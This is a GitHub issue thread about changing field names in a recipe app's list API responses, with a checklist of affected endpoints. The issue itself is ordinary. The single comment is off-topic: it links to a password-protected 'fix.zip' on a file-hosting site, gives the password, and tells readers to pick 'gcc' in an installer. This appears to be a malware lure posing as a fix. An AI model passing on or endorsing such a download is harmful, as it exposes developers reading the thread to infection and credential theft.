### ISSUE TITLE
[ISSUE] 레시피 리스트 불러오는 API response 수정 

### ISSUE THREAD

**Issue by eogns47** [Recipic/Recipic-Server#73]
## 📝설명
userId ➡️ userNickname 변경
userProfileImageUrl 추가
brand ➡️ brandName 변경

## ✔️ TO-DO
- [x] 일반인 레시피 api
- [x] 유명인 레시피 api
- [x] 스크랩한 레시피 api
- [ ] 작성한 레시피 api
- [x] 전체 레시피 api

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
